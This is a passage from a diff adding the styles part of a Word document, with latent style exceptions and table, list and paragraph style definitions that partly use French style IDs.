+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+  </w:latentStyles>
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+    <w:name w:val="Normal"/>
+    <w:qFormat/>
+  </w:style>
+  <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
+    <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="TableauNormal">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="Aucuneliste">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00DD600F"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Grilledutableau">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableauNormal"/>
+    <w:uiPriority w:val="59"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A352B3"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
     </w:tblPr>
   </w:style>
 </w:styles>
